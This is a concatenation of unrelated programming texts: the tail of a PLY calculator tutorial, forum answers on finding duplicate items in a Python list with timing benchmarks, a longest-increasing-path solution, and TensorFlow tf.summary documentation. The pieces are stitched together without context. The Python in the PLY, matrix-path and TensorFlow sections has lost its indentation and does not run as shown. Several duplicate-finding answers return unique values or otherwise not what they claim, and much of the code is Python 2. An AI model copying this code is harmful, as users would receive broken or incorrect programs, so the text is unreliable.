elif t[2] == '-': t[0] = t[1] - t[3]
elif t[2] == '*': t[0] = t[1] * t[3]
elif t[2] == '/': t[0] = t[1] / t[3]
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_expression_number(t):
'expression : NUMBER'
t[0] = t[1]
def p_error(t):
if t is None: # lexer error
return
print(f"Syntax Error: {t.value!r}")
parser = yacc.yacc()
if __name__ == "__main__":
while True:
inp = input("> ")
print(parser.parse(inp))
First we start off with the tokens: numbers, mathematical operators, and parentheses.
You might notice that I didn't use the reserved_tokens trick, but you can implement it if you want.
Next we have a simple number token, which matches one or more digits with \d+ and then converts its value from a string to an integer.
The next piece of code we haven't used before is t_ignore.
This variable holds a string of all the characters the lexer should ignore; here it is ' \t', meaning spaces and tabs.
When the lexer sees these, it just skips them. This allows users to add whitespace without affecting the lexer.
Now we have 3 parser directives.
The first is a large one, producing an expression from 4 possible input values, one for each math operation.
Each input has an expression on either side of the math operator.
Inside this directive, we have some (pretty ugly) code that performs the correct operation based on the operation token given.
If you want to make this prettier, consider a dictionary dispatch using the Python stdlib operator module, as sketched below.
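For instance, a possible rewrite with a dispatch dictionary (a sketch, not the tutorial's official code):
import operator

ops = {
    '+': operator.add,
    '-': operator.sub,
    '*': operator.mul,
    '/': operator.truediv,
}

def p_expression_binop(t):
    '''expression : expression PLUS expression
                  | expression MINUS expression
                  | expression TIMES expression
                  | expression DIVIDE expression'''
    t[0] = ops[t[2]](t[1], t[3])  # look up the operator function by its symbol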
Next, we define an expression with parentheses around it as being the same as the expression inside.
This substitutes the inner expression's value in for the parenthesized group, so whatever is inside evaluates first.
With very little code we created a rule that deals with nested parentheses correctly.
Finally, we define a number as being able to be an expression, which allows a number to be used as one of the expressions in rule 1.
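One caveat worth knowing: as written, the grammar is ambiguous, so yacc will report shift/reduce conflicts and resolve them itself, and * and / are not guaranteed to bind tighter than + and -. PLY supports an optional module-level precedence table to make this explicit; a sketch of what it might look like:
# Sketch: declare that * and / bind tighter than + and -, all left-associative
precedence = (
    ('left', 'PLUS', 'MINUS'),
    ('left', 'TIMES', 'DIVIDE'),
)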
For a challenge, try adding variables into this calculator!
You should be able to set variables using syntax like varname = any_expression, and you should be able to use variables in expressions.
If you're stuck, see one solution from the PLY docs.
That's it!
Thanks for reading! If you have questions, feel free to ask on the Replit discord's #help-and-reviews channel, or just the comments.
Have fun!
|
To remove duplicates use set(a). To print duplicates, something like:
a = [1,2,3,2,1,5,6,5,5,5]
import collections
print [item for item, count in collections.Counter(a).items() if count > 1]
## [1, 2, 5]
Note that Counter is not particularly efficient (timings) and is probably overkill here. A set will perform better. This code computes a list of unique elements in source order:
seen = set()
uniq = []
for x in a:
    if x not in seen:
        uniq.append(x)
        seen.add(x)
or, more concisely:
seen = set()
uniq = [x for x in a if x not in seen and not seen.add(x)]
I don't recommend the latter style, because it is not obvious what not seen.add(x) is doing (the set add() method always returns None, hence the need for not).
To compute the list of duplicated elements without libraries:
seen = {}
dupes = []
for x in a:
    if x not in seen:
        seen[x] = 1
    else:
        if seen[x] == 1:
            dupes.append(x)
        seen[x] += 1
If the list elements are not hashable, you cannot use sets/dicts and have to fall back to a quadratic-time solution (compare each with each). For example:
a = [[1], [2], [3], [1], [5], [3]]
no_dupes = [x for n, x in enumerate(a) if x not in a[:n]]
print no_dupes  # [[1], [2], [3], [5]]
dupes = [x for n, x in enumerate(a) if x in a[:n]]
print dupes  # [[1], [3]]
>>> l = [1,2,3,4,4,5,5,6,1]
>>> set([x for x in l if l.count(x) > 1])
set([1, 4, 5])
You don't need the count, just whether or not the element was seen before. I adapted that answer to this problem:
def list_duplicates(seq):
    seen = set()
    seen_add = seen.add
    # adds all elements it doesn't know yet to seen and all other to seen_twice
    seen_twice = set(x for x in seq if x in seen or seen_add(x))
    # turn the set into a list (as requested)
    return list(seen_twice)

a = [1,2,3,2,1,5,6,5,5,5]
list_duplicates(a)  # yields [1, 2, 5]
Just in case speed matters, here are some timings:
# file: test.py
import collections

def thg435(l):
    return [x for x, y in collections.Counter(l).items() if y > 1]

def moooeeeep(l):
    seen = set()
    seen_add = seen.add
    # adds all elements it doesn't know yet to seen and all other to seen_twice
    seen_twice = set(x for x in l if x in seen or seen_add(x))
    # turn the set into a list (as requested)
    return list(seen_twice)

def RiteshKumar(l):
    return list(set([x for x in l if l.count(x) > 1]))

def JohnLaRooy(L):
    seen = set()
    seen2 = set()
    seen_add = seen.add
    seen2_add = seen2.add
    for item in L:
        if item in seen:
            seen2_add(item)
        else:
            seen_add(item)
    return list(seen2)

l = [1,2,3,2,1,5,6,5,5,5]*100
Here are the results: (well done @JohnLaRooy!)
$ python -mtimeit -s 'import test' 'test.JohnLaRooy(test.l)'
10000 loops, best of 3: 74.6 usec per loop
$ python -mtimeit -s 'import test' 'test.moooeeeep(test.l)'
10000 loops, best of 3: 91.3 usec per loop
$ python -mtimeit -s 'import test' 'test.thg435(test.l)'
1000 loops, best of 3: 266 usec per loop
$ python -mtimeit -s 'import test' 'test.RiteshKumar(test.l)'
100 loops, best of 3: 8.35 msec per loop
Interestingly, besides the timings themselves, the ranking also changes slightly under pypy. Most interestingly, the Counter-based approach benefits hugely from pypy's optimizations, whereas the method-caching approach I suggested seems to have almost no effect.
$ pypy -mtimeit -s 'import test' 'test.JohnLaRooy(test.l)'
100000 loops, best of 3: 17.8 usec per loop
$ pypy -mtimeit -s 'import test' 'test.thg435(test.l)'
10000 loops, best of 3: 23 usec per loop
$ pypy -mtimeit -s 'import test' 'test.moooeeeep(test.l)'
10000 loops, best of 3: 39.3 usec per loop
Apparently this effect is related to the "duplicatedness" of the input data. I set l = [random.randrange(1000000) for i in xrange(10000)] and got these results:
$ pypy -mtimeit -s 'import test' 'test.moooeeeep(test.l)'
1000 loops, best of 3: 495 usec per loop
$ pypy -mtimeit -s 'import test' 'test.JohnLaRooy(test.l)'
1000 loops, best of 3: 499 usec per loop
$ pypy -mtimeit -s 'import test' 'test.thg435(test.l)'
1000 loops, best of 3: 1.68 msec per loop
I came across this question while looking for something related, and I wonder why nobody offered a generator-based solution. Solving this problem would be:
>>> print list(getDupes_9([1,2,3,2,1,5,6,5,5,5]))
[1, 2, 5]
I was concerned about scalability, so I tested several approaches, including naive ones that work well on small lists but scale horribly as lists get large (note: using timeit would have been better, but this is illustrative).
I included @moooeeeep for comparison (it is impressively fast: fastest if the input list is completely random) and an itertools approach that is even faster again for mostly-sorted lists... Now includes the pandas approach from @firelynx: slow, but not horribly so, and simple. Note: the sort/tee/zip approach is consistently fastest on my machine for large mostly-ordered lists; moooeeeep is fastest for shuffled lists, but your mileage may vary.
Advantages
Assumptions
The fastest solution, 1m entries:
def getDupes(c):
    '''sort/tee/izip'''
    a, b = itertools.tee(sorted(c))
    next(b, None)
    r = None
    for k, g in itertools.izip(a, b):
        if k != g: continue
        if k != r:
            yield k
            r = k
Approaches tested
import itertools
import time
import random

def getDupes_1(c):
    '''naive'''
    for i in xrange(0, len(c)):
        if c[i] in c[:i]:
            yield c[i]

def getDupes_2(c):
    '''set len change'''
    s = set()
    for i in c:
        l = len(s)
        s.add(i)
        if len(s) == l:
            yield i

def getDupes_3(c):
    '''in dict'''
    d = {}
    for i in c:
        if i in d:
            if d[i]:
                yield i
                d[i] = False
        else:
            d[i] = True

def getDupes_4(c):
    '''in set'''
    s,r = set(),set()
    for i in c:
        if i not in s:
            s.add(i)
        elif i not in r:
            r.add(i)
            yield i

def getDupes_5(c):
    '''sort/adjacent'''
    c = sorted(c)
    r = None
    for i in xrange(1, len(c)):
        if c[i] == c[i - 1]:
            if c[i] != r:
                yield c[i]
                r = c[i]

def getDupes_6(c):
    '''sort/groupby'''
    def multiple(x):
        try:
            x.next()
            x.next()
            return True
        except:
            return False
    for k, g in itertools.ifilter(lambda x: multiple(x[1]), itertools.groupby(sorted(c))):
        yield k

def getDupes_7(c):
    '''sort/zip'''
    c = sorted(c)
    r = None
    for k, g in zip(c[:-1],c[1:]):
        if k == g:
            if k != r:
                yield k
                r = k

def getDupes_8(c):
    '''sort/izip'''
    c = sorted(c)
    r = None
    for k, g in itertools.izip(c[:-1],c[1:]):
        if k == g:
            if k != r:
                yield k
                r = k

def getDupes_9(c):
    '''sort/tee/izip'''
    a, b = itertools.tee(sorted(c))
    next(b, None)
    r = None
    for k, g in itertools.izip(a, b):
        if k != g: continue
        if k != r:
            yield k
            r = k

def getDupes_a(l):
    '''moooeeeep'''
    seen = set()
    seen_add = seen.add
    # adds all elements it doesn't know yet to seen and all other to seen_twice
    for x in l:
        if x in seen or seen_add(x):
            yield x

def getDupes_b(x):
    '''iter*/sorted'''
    x = sorted(x)
    def _matches():
        for k,g in itertools.izip(x[:-1],x[1:]):
            if k == g:
                yield k
    for k, n in itertools.groupby(_matches()):
        yield k

def getDupes_c(a):
    '''pandas'''
    import pandas as pd
    vc = pd.Series(a).value_counts()
    i = vc[vc > 1].index
    for _ in i:
        yield _

def hasDupes(fn,c):
    try:
        if fn(c).next():
            return True  # Found a dupe
    except StopIteration:
        pass
    return False

def getDupes(fn,c):
    return list(fn(c))

STABLE = True
if STABLE:
    print 'Finding FIRST then ALL duplicates, single dupe of "nth" placed element in 1m element array'
else:
    print 'Finding FIRST then ALL duplicates, single dupe of "n" included in randomised 1m element array'
for location in (50,250000,500000,750000,999999):
    for test in (getDupes_2, getDupes_3, getDupes_4, getDupes_5, getDupes_6,
                 getDupes_8, getDupes_9, getDupes_a, getDupes_b, getDupes_c):
        print 'Test %-15s:%10d - '%(test.__doc__ or test.__name__,location),
        deltas = []
        for FIRST in (True,False):
            for i in xrange(0, 5):
                c = range(0,1000000)
                if STABLE:
                    c[0] = location
                else:
                    c.append(location)
                    random.shuffle(c)
                start = time.time()
                if FIRST:
                    print '.' if location == test(c).next() else '!',
                else:
                    print '.' if [location] == list(test(c)) else '!',
                deltas.append(time.time()-start)
            print ' -- %0.3f '%(sum(deltas)/len(deltas)),
        print
    print
The results for the "all duplicates" test were consistent, finding "first" then "all" duplicates in this array:
Finding FIRST then ALL duplicates, single dupe of "nth" placed element in 1m element array Test set len change : 500000 - . . . . . -- 0.264 . . . . . -- 0.402 Test in dict : 500000 - . . . . . -- 0.163 . . . . . -- 0.250 Test in set : 500000 - . . . . . -- 0.163 . . . . . -- 0.249 Test sort/adjacent : 500000 - . . . . . -- 0.159 . . . . . -- 0.229 Test sort/groupby : 500000 - . . . . . -- 0.860 . . . . . -- 1.286 Test sort/izip : 500000 - . . . . . -- 0.165 . . . . . -- 0.229 Test sort/tee/izip : 500000 - . . . . . -- 0.145 . . . . . -- 0.206 * Test moooeeeep : 500000 - . . . . . -- 0.149 . . . . . -- 0.232 Test iter*/sorted : 500000 - . . . . . -- 0.160 . . . . . -- 0.221 Test pandas : 500000 - . . . . . -- 0.493 . . . . . -- 0.499
When the lists are shuffled first, the price of the sort becomes apparent: efficiency drops noticeably and the @moooeeeep approach dominates, with the set and dict approaches similar but slightly behind:
Finding FIRST then ALL duplicates, single dupe of "n" included in randomised 1m element array Test set len change : 500000 - . . . . . -- 0.321 . . . . . -- 0.473 Test in dict : 500000 - . . . . . -- 0.285 . . . . . -- 0.360 Test in set : 500000 - . . . . . -- 0.309 . . . . . -- 0.365 Test sort/adjacent : 500000 - . . . . . -- 0.756 . . . . . -- 0.823 Test sort/groupby : 500000 - . . . . . -- 1.459 . . . . . -- 1.896 Test sort/izip : 500000 - . . . . . -- 0.786 . . . . . -- 0.845 Test sort/tee/izip : 500000 - . . . . . -- 0.743 . . . . . -- 0.804 Test moooeeeep : 500000 - . . . . . -- 0.234 . . . . . -- 0.311 * Test iter*/sorted : 500000 - . . . . . -- 0.776 . . . . . -- 0.840 Test pandas : 500000 - . . . . . -- 0.539 . . . . . -- 0.540
You can use iteration_utilities.duplicates:
>>> from iteration_utilities import duplicates
>>> list(duplicates([1,1,2,1,2,3,4,2]))
[1, 1, 2, 2]
or if you only want one of each duplicate, it can be combined with iteration_utilities.unique_everseen:
>>> from iteration_utilities import unique_everseen
>>> list(unique_everseen(duplicates([1,1,2,1,2,3,4,2])))
[1, 2]
It can also handle unhashable elements (at the cost of performance, however):
>>> list(duplicates([[1], [2], [1], [3], [1]]))
[[1], [1]]
>>> list(unique_everseen(duplicates([[1], [2], [1], [3], [1]])))
[[1]]
That's something only a few of the other approaches here can handle.
I did a quick benchmark containing most (but not all) of the approaches mentioned here.
The first benchmark included only a small range of list lengths because some approaches have O(n**2) behavior.
In the graphs, the y-axis represents time, so a lower value means better. It is also plotted log-log so the wide range of values can be visualized better:
Removing the O(n**2) approaches, I did another benchmark up to half a million elements in a list:
As you can see, the duplicates(...) approach is faster than any of the other approaches, and even the chained unique_everseen(duplicates(...)) was faster or equally fast as the other approaches.
One additional interesting thing to note here is that the pandas approaches are very slow for small lists but can easily compete for longer lists.
However, as these benchmarks show, most of the approaches perform roughly equally, so it doesn't matter much which one is used (except for the 3 that had O(n**2) runtime).
from iteration_utilities import duplicates, unique_everseen
from collections import Counter
import pandas as pd
import itertools

def georg_counter(it):
    return [item for item, count in Counter(it).items() if count > 1]

def georg_set(it):
    seen = set()
    uniq = []
    for x in it:
        if x not in seen:
            uniq.append(x)
            seen.add(x)

def georg_set2(it):
    seen = set()
    return [x for x in it if x not in seen and not seen.add(x)]

def georg_set3(it):
    seen = {}
    dupes = []
    for x in it:
        if x not in seen:
            seen[x] = 1
        else:
            if seen[x] == 1:
                dupes.append(x)
            seen[x] += 1

def RiteshKumar_count(l):
    return set([x for x in l if l.count(x) > 1])

def moooeeeep(seq):
    seen = set()
    seen_add = seen.add
    # adds all elements it doesn't know yet to seen and all other to seen_twice
    seen_twice = set(x for x in seq if x in seen or seen_add(x))
    # turn the set into a list (as requested)
    return list(seen_twice)

def F1Rumors_implementation(c):
    a, b = itertools.tee(sorted(c))
    next(b, None)
    r = None
    for k, g in zip(a, b):
        if k != g: continue
        if k != r:
            yield k
            r = k

def F1Rumors(c):
    return list(F1Rumors_implementation(c))

def Edward(a):
    d = {}
    for elem in a:
        if elem in d:
            d[elem] += 1
        else:
            d[elem] = 1
    return [x for x, y in d.items() if y > 1]

def wordsmith(a):
    return pd.Series(a)[pd.Series(a).duplicated()].values

def NikhilPrabhu(li):
    li = li.copy()
    for x in set(li):
        li.remove(x)
    return list(set(li))

def firelynx(a):
    vc = pd.Series(a).value_counts()
    return vc[vc > 1].index.tolist()

def HenryDev(myList):
    newList = set()
    for i in myList:
        if myList.count(i) >= 2:
            newList.add(i)
    return list(newList)

def yota(number_lst):
    seen_set = set()
    duplicate_set = set(x for x in number_lst if x in seen_set or seen_set.add(x))
    return seen_set - duplicate_set

def IgorVishnevskiy(l):
    s = set(l)
    d = []
    for x in l:
        if x in s:
            s.remove(x)
        else:
            d.append(x)
    return d

def it_duplicates(l):
    return list(duplicates(l))

def it_unique_duplicates(l):
    return list(unique_everseen(duplicates(l)))
from simple_benchmark import benchmark
import random

funcs = [
    georg_counter, georg_set, georg_set2, georg_set3, RiteshKumar_count, moooeeeep,
    F1Rumors, Edward, wordsmith, NikhilPrabhu, firelynx, HenryDev, yota,
    IgorVishnevskiy, it_duplicates, it_unique_duplicates
]

args = {2**i: [random.randint(0, 2**(i-1)) for _ in range(2**i)] for i in range(2, 12)}

b = benchmark(funcs, args, 'list size')
b.plot()
funcs = [
    georg_counter, georg_set, georg_set2, georg_set3, moooeeeep,
    F1Rumors, Edward, wordsmith, firelynx, yota, IgorVishnevskiy,
    it_duplicates, it_unique_duplicates
]

args = {2**i: [random.randint(0, 2**(i-1)) for _ in range(2**i)] for i in range(2, 20)}

b = benchmark(funcs, args, 'list size')
b.plot()
1 This is from a third-party library I have written: iteration_utilities.
collections.Counter is new in Python 2.7:
Python 2.5.4 (r254:67916, May 31 2010, 15:03:39)
[GCC 4.1.2 20080704 (Red Hat 4.1.2-46)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> a = [1,2,3,2,1,5,6,5,5,5]
>>> import collections
>>> print [x for x, y in collections.Counter(a).items() if y > 1]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'Counter'
>>>
On an older version you can use a conventional dict instead:
a = [1,2,3,2,1,5,6,5,5,5]
d = {}
for elem in a:
    if elem in d:
        d[elem] += 1
    else:
        d[elem] = 1

print [x for x, y in d.items() if y > 1]
Using pandas:
>>> import pandas as pd
>>> a = [1, 2, 1, 3, 3, 3, 0]
>>> pd.Series(a)[pd.Series(a).duplicated()].values
array([1, 3, 3])
Here is a clean and concise solution:
for x in set(li):
    li.remove(x)

li = list(set(li))
How about looping through each element in the list, checking the number of occurrences, then adding them to a set, which will then print the duplicates? Hope this helps someone out there.
myList = [2, 4, 6, 8, 4, 6, 12]
newList = set()

for i in myList:
    if myList.count(i) >= 2:
        newList.add(i)

print(list(newList))
## [4, 6]
Without converting to a list, probably the simplest way would be something like below. This may be useful during an interview when they ask not to use sets:
a = [1,2,3,3,3]
dup = []
for each in a:
    if each not in dup:
        dup.append(each)
print(dup)
or else, to get 2 separate lists of unique values and duplicate values:
a = [1,2,3,3,3]
uniques = []
dups = []

for each in a:
    if each not in uniques:
        uniques.append(each)
    else:
        dups.append(each)

print("Unique values are below:")
print(uniques)
print("Duplicate values are below:")
print(dups)
I would do this with pandas, because I use pandas a lot
import pandas as pd
a = [1,2,3,3,3,4,5,6,6,7]
vc = pd.Series(a).value_counts()
vc[vc > 1].index.tolist()
Gives
[3,6]
It probably isn't very efficient, but it sure is less code than a lot of the other answers, so I thought I would contribute.
The third example of the accepted answer gives an erroneous answer and does not attempt to give duplicates. Here is the correct version:
number_lst = [1, 1, 2, 3, 5, ...]

seen_set = set()
duplicate_set = set(x for x in number_lst if x in seen_set or seen_set.add(x))
unique_set = seen_set - duplicate_set
A bit late, but maybe helpful for some. For a largish list, I found this worked for me.
l = [1,2,3,5,4,1,3,1]
s = set(l)
d = []
for x in l:
    if x in s:
        s.remove(x)
    else:
        d.append(x)
d  # [1, 3, 1]
It shows just the duplicates, all of them, and preserves order.
A very simple and quick way of finding duplicates with one iteration in Python is:
testList = ['red', 'blue', 'red', 'green', 'blue', 'blue']

testListDict = {}

for item in testList:
    try:
        testListDict[item] += 1
    except:
        testListDict[item] = 1

print testListDict
The output will be as follows:
>>> print testListDict {'blue': 3, 'green': 1, 'red': 2}
This and much more on my blog http://www.howtoprogramwithpython.com
We can use itertools.groupby to find all the items that have dups:
from itertools import groupby

myList = [2, 4, 6, 8, 4, 6, 12]
# when the list is sorted, groupby groups by consecutive elements which are similar
for x, y in groupby(sorted(myList)):
    # list(y) returns all the occurences of item x
    if len(list(y)) > 1:
        print x
The output will be:
4
6
list2 = [1, 2, 3, 4, 1, 2, 3]
lset = set()

[(lset.add(item), list2.append(item)) for item in list2 if item not in lset]

print list(lset)
A one-line solution:
set([i for i in list if sum([1 for a in list if a == i]) > 1])
There are a lot of answers up here, but I think this is a relatively readable and easy to understand approach:
def get_duplicates(sorted_list):
    duplicates = []
    last = sorted_list[0]
    for x in sorted_list[1:]:
        if x == last:
            duplicates.append(x)
        last = x
    return set(duplicates)
Notes:
Here is a fast generator that uses a dict to store each element as a key with a boolean value for checking whether the duplicate item has already been yielded.
For lists where all the elements are hashable types:
def gen_dupes(array):
    unique = {}
    for value in array:
        if value in unique and unique[value]:
            unique[value] = False
            yield value
        else:
            unique[value] = True

array = [1, 2, 2, 3, 4, 1, 5, 2, 6, 6]
print(list(gen_dupes(array)))
# => [2, 1, 6]
For lists that may contain lists:
def gen_dupes(array):
    unique = {}
    for value in array:
        is_list = False
        if type(value) is list:
            value = tuple(value)
            is_list = True

        if value in unique and unique[value]:
            unique[value] = False
            if is_list:
                value = list(value)
            yield value
        else:
            unique[value] = True

array = [1, 2, 2, [1, 2], 3, 4, [1, 2], 5, 2, 6, 6]
print(list(gen_dupes(array)))
# => [2, [1, 2], 6]
def removeduplicates(a):
    seen = set()
    for i in a:
        if i not in seen:
            seen.add(i)
    return seen

print(removeduplicates([1,1,2,2]))
Some other tests. Of course, doing...
set([x for x in l if l.count(x) > 1])
...is too costly. It is roughly 500 times faster (a longer array gives better results) to use the following final method:
def dups_count_dict(l):
    d = {}

    for item in l:
        if item not in d:
            d[item] = 0

        d[item] += 1

    result_d = {key: val for key, val in d.iteritems() if val > 1}

    return result_d.keys()
Just 2 loops, and no very costly l.count() operations.
Here is code to compare the methods. The code is below; here is the output:
dups_count: 13.368s          # this is a function which uses l.count()
dups_count_dict: 0.014s      # this is the final best function (of the 3 functions)
dups_count_counter: 0.024s   # collections.Counter
The test code:
import numpy as np
from time import time
from collections import Counter

class TimerCounter(object):
    def __init__(self):
        self._time_sum = 0

    def start(self):
        self.time = time()

    def stop(self):
        self._time_sum += time() - self.time

    def get_time_sum(self):
        return self._time_sum


def dups_count(l):
    return set([x for x in l if l.count(x) > 1])


def dups_count_dict(l):
    d = {}

    for item in l:
        if item not in d:
            d[item] = 0

        d[item] += 1

    result_d = {key: val for key, val in d.iteritems() if val > 1}

    return result_d.keys()


def dups_counter(l):
    counter = Counter(l)

    result_d = {key: val for key, val in counter.iteritems() if val > 1}

    return result_d.keys()


def gen_array():
    np.random.seed(17)
    return list(np.random.randint(0, 5000, 10000))


def assert_equal_results(*results):
    primary_result = results[0]
    other_results = results[1:]

    for other_result in other_results:
        assert set(primary_result) == set(other_result) and len(primary_result) == len(other_result)


if __name__ == '__main__':
    dups_count_time = TimerCounter()
    dups_count_dict_time = TimerCounter()
    dups_count_counter = TimerCounter()

    l = gen_array()

    for i in range(3):
        dups_count_time.start()
        result1 = dups_count(l)
        dups_count_time.stop()

        dups_count_dict_time.start()
        result2 = dups_count_dict(l)
        dups_count_dict_time.stop()

        dups_count_counter.start()
        result3 = dups_counter(l)
        dups_count_counter.stop()

        assert_equal_results(result1, result2, result3)

    print 'dups_count: %.3f' % dups_count_time.get_time_sum()
    print 'dups_count_dict: %.3f' % dups_count_dict_time.get_time_sum()
    print 'dups_count_counter: %.3f' % dups_count_counter.get_time_sum()
This is the way I had to do it, because I challenged myself not to use other methods:
def dupList(oldlist):
    if type(oldlist) == type((2, 2)):
        oldlist = [x for x in oldlist]
    newList = []
    newList = newList + oldlist
    oldlist = oldlist
    forbidden = []
    checkPoint = 0
    for i in range(len(oldlist)):
        #print 'start i', i
        if i in forbidden:
            continue
        else:
            for j in range(len(oldlist)):
                #print 'start j', j
                if j in forbidden:
                    continue
                else:
                    #print 'after Else'
                    if i != j:
                        #print 'i,j', i,j
                        #print oldlist
                        #print newList
                        if oldlist[j] == oldlist[i]:
                            #print 'oldlist[i],oldlist[j]', oldlist[i],oldlist[j]
                            forbidden.append(j)
                            #print 'forbidden', forbidden
                            del newList[j - checkPoint]
                            #print newList
                            checkPoint = checkPoint + 1
    return newList
so your sample works as:
>>> a = [1,2,3,3,3,4,5,6,6,7]
>>> dupList(a)
[1, 2, 3, 4, 5, 6, 7]
Using toolz:
from toolz import frequencies, valfilter

a = [1,2,2,3,4,5,4]

>>> list(valfilter(lambda count: count > 1, frequencies(a)).keys())
[2, 4]
I'm coming into this discussion much, much later. Even so, I would like to tackle this problem with a one-liner, because that's the charm of Python. If we just want to get the duplicates into a separate list (or any collection), I would suggest the following. Say we have a list with duplicates, which we can call "target".
target=[1,2,3,4,4,4,3,5,6,8,4,3]
Now, if we want to get the duplicates, we can use the one-liner as follows:
duplicates=dict(set((x,target.count(x)) for x in filter(lambda rec : target.count(rec)>1,target)))
This code will put the duplicated records as keys and their counts as values into the dictionary 'duplicates'. The 'duplicates' dictionary will look like this:
{3: 3, 4: 4}  # saying 3 is repeated 3 times and 4 is repeated 4 times
If you just want all the records with duplicates in a list, it's much shorter code:
duplicates=filter(lambda rec : target.count(rec)>1,target)
The output will be:
[3, 4, 4, 4, 3, 4, 3]
This works perfectly on Python 2.7.x+ versions.
Method 1:
list(set([val for idx, val in enumerate(input_list) if val in input_list[idx+1:]]))
Explanation: [val for idx, val in enumerate(input_list) if val in input_list[idx+1:]] is a list comprehension that returns an element if the same element is present from its current position (the index) onward in the list.
Example: input_list = [42,31,42,31,3,31,31,5,6,6,6,6,6,7,42]
Starting with the first element in the list, 42, with index 0, it checks whether the element 42 is present in input_list[1:] (i.e. from index 1 to the end of the list). Because 42 is present in input_list[1:], it will return 42.
Then it moves to the next element, 31, with index 1, and checks whether the element 31 is present in input_list[2:] (i.e. from index 2 to the end of the list); because 31 is present in input_list[2:], it will return 31.
Similarly, it goes through all the elements of the list, and returns only the repeated/duplicated elements into a list.
Then, because we have duplicates in a list, we need to pick one of each duplicate, i.e. remove duplicates among the duplicates; to do so, we call the Python built-in set(), and it removes the duplicates,
Then we are left with a set, not a list, and so, to convert from a set to a list, we use typecasting, list(), which converts the set of elements into a list.
Method 2:
def dupes(ilist):
    temp_list = []  # initially, empty temporary list
    dupe_list = []  # initially, empty duplicate list
    for each in ilist:
        if each in temp_list:  # Found a Duplicate element
            if not each in dupe_list:  # Avoid duplicate elements in dupe_list
                dupe_list.append(each)  # Add duplicate element to dupe_list
        else:
            temp_list.append(each)  # Add a new (non-duplicate) to temp_list
    return dupe_list
Explanation: Here we create two empty lists to begin with, then keep traversing all the elements of the list to see if each exists in temp_list (initially empty). If it is not in temp_list, we add it to the temp list using the append method.
If it already exists in temp_list, it means the current element of the list is a duplicate, and therefore we need to add it to dupe_list using the append method.
raw_list = [1,2,3,3,4,5,6,6,7,2,3,4,2,3,4,1,3,4,]

clean_list = list(set(raw_list))
duplicated_items = []

for item in raw_list:
    try:
        clean_list.remove(item)
    except ValueError:
        duplicated_items.append(item)

print(duplicated_items)
# [3, 6, 2, 3, 4, 2, 3, 4, 1, 3, 4]
Basically, you remove duplicates by converting to a set (clean_list), then iterate over raw_list, removing each item from the clean list as it occurs in raw_list. If an item is not found, the ValueError exception is caught and the item is added to the duplicated_items list.
If the index of the duplicated items is needed, just enumerate the list and play around with the index (for index, item in enumerate(raw_list):), which is faster and optimised for large lists (like thousands+ of elements).
Use the sort() function. Duplicates can be identified by looping over it and checking l1[i] == l1[i+1] .
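A minimal sketch of that sort-then-scan idea (the variable names are mine):
l1 = [1, 2, 3, 2, 1, 5, 6, 5, 5, 5]
l1.sort()  # sorting places equal values next to each other

dupes = set()
for i in range(len(l1) - 1):
    if l1[i] == l1[i + 1]:  # adjacent equal values indicate a duplicate
        dupes.add(l1[i])

print(sorted(dupes))  # [1, 2, 5]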
|
Description
Given an integer matrix, find the length of the longest increasing path.
From each cell, you can either move to four directions: left, right, up or down. You may NOT move diagonally or move outside of the boundary (i.e. wrap-around is not allowed).
Example 1:
Input: nums = [[9,9,4],[6,6,8],[2,1,1]]
Output: 4
Explanation: The longest increasing path is [1, 2, 6, 9].
Example 2:
Input: nums = [[3,4,5],[3,2,6],[2,2,1]]
Output: 4
Explanation: The longest increasing path is [3, 4, 5, 6]. Moving diagonally is not allowed.
Explanation
DFS + memoization
Python Solution
from typing import List

class Solution:
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix:
return 0
cache = [[0 for j in range(len(matrix[0]))] for i in range(len(matrix))]
result = 0
for i in range(len(matrix)):
for j in range(len(matrix[0])):
result = max(result, self.helper(matrix, i, j, cache))
return result
def helper(self, matrix, i, j, cache):
directions = [(0, 1), (0, -1), (-1, 0), (1, 0)]
if cache[i][j] != 0:
return cache[i][j]
for direction in directions:
x = i + direction[0]
y = j + direction[1]
if 0 <= x and x < len(matrix) and 0 <= y and y < len(matrix[0]) and matrix[x][y] > matrix[i][j]:
cache[i][j] = max(cache[i][j], self.helper(matrix, x, y, cache))
cache[i][j] += 1
return cache[i][j]
Time Complexity: O(MN), since each of the M*N cells is computed once thanks to the cache
Space Complexity: O(MN) for the cache and recursion stack
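A quick sanity check of the solution on Example 1 (my own snippet, assuming the class above is in scope):
matrix = [[9, 9, 4],
          [6, 6, 8],
          [2, 1, 1]]
print(Solution().longestIncreasingPath(matrix))  # expected output: 4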
|
Operations for writing summary data, for use in analysis and visualization.
The tf.summary module provides APIs for writing summary data. This data can be visualized in TensorBoard, the visualization toolkit that comes with TensorFlow. See the TensorBoard website for more detailed tutorials about how to use these APIs, or some quick examples below.
Example usage with eager execution, the default in TF 2.0:
writer = tf.summary.create_file_writer("/tmp/mylogs")
with writer.as_default():
for step in range(100):
# other model code would go here
tf.summary.scalar("my_metric", 0.5, step=step)
writer.flush()
Example usage with tf.function graph execution:
writer = tf.summary.create_file_writer("/tmp/mylogs")
@tf.function
def my_func(step):
# other model code would go here
with writer.as_default():
tf.summary.scalar("my_metric", 0.5, step=step)
for step in range(100):
my_func(step)
writer.flush()
Example usage with legacy TF 1.x graph execution:
with tf.compat.v1.Graph().as_default():
step = tf.Variable(0, dtype=tf.int64)
step_update = step.assign_add(1)
writer = tf.summary.create_file_writer("/tmp/mylogs")
with writer.as_default():
tf.summary.scalar("my_metric", 0.5, step=step)
all_summary_ops = tf.compat.v1.summary.all_v2_summary_ops()
writer_flush = writer.flush()
sess = tf.compat.v1.Session()
sess.run([writer.init(), step.initializer])
for i in range(100):
sess.run(all_summary_ops)
sess.run(step_update)
sess.run(writer_flush)
Modules
experimental module: Public API for tf.summary.experimental namespace.
Classes
class SummaryWriter: Interface representing a stateful summary writer object.
Functions
audio(...): Write an audio summary.
create_file_writer(...): Creates a summary file writer for the given log directory.
create_noop_writer(...): Returns a summary writer that does nothing.
flush(...): Forces summary writer to send any buffered data to storage.
histogram(...): Write a histogram summary.
image(...): Write an image summary.
record_if(...): Sets summary recording on or off per the provided boolean value.
scalar(...): Write a scalar summary.
should_record_summaries(...): Returns boolean Tensor which is true if summaries should be recorded.
text(...): Write a text summary.
trace_export(...): Stops and exports the active trace as a Summary and/or profile file.
trace_off(...): Stops the current trace and discards any collected information.
